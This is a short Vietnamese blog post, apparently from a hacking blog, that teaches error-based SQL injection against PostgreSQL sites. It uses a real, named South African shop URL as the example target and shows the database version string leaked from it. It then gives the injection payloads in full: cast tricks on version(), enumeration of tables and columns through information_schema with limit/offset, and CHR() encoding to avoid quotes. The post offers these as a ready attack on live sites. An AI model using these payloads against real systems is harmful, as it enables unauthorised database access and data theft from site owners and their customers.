Hướng dẫn khai thác site postgreSQL
Hôm nay mình chỉ sơ sơ cho ae cách khai thác site này, để lần sau có gặp thì làm tượng tự. Vì hôm nay đang bận code tool nên ko thể up đầy đủ cho ae được,nên mình chỉ up cái cơ bản
Lấy site của Unknow làm ví dụ nhé
http://www.seemanns.co.za/productlist.php?rangeid=2
Get version()
=>PostgreSQL 8.3.12 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3
Get table_name và column_name ta dùng limit offset nhé
=>pg_type: Đây chính là table đầu tiên của nó, ta cứ tăng offset 0 đến hết để tìm ra table cần tìm
Khi đã tìm được table thì conver to ORACLE CHAR nhé
=>typname : Đây là column đầu tiên có trong table pg_type
Cứ thế mà tiếp tục nhé
Get thông tin, khi đã có column trong table
Lấy site của Unknow làm ví dụ nhé
http://www.seemanns.co.za/productlist.php?rangeid=2
Get version()
Quote:
| and 1=cast(version() as int)-- |
Get table_name và column_name ta dùng limit offset nhé
Quote:
| and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)-- |
Khi đã tìm được table thì conver to ORACLE CHAR nhé
Quote:
| and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)-- |
Cứ thế mà tiếp tục nhé
Get thông tin, khi đã có column trong table
Quote:
| and 1=cast((select typname from pg_type limit 1 offset 0) as int)-- |
Không có nhận xét nào:
Đăng nhận xét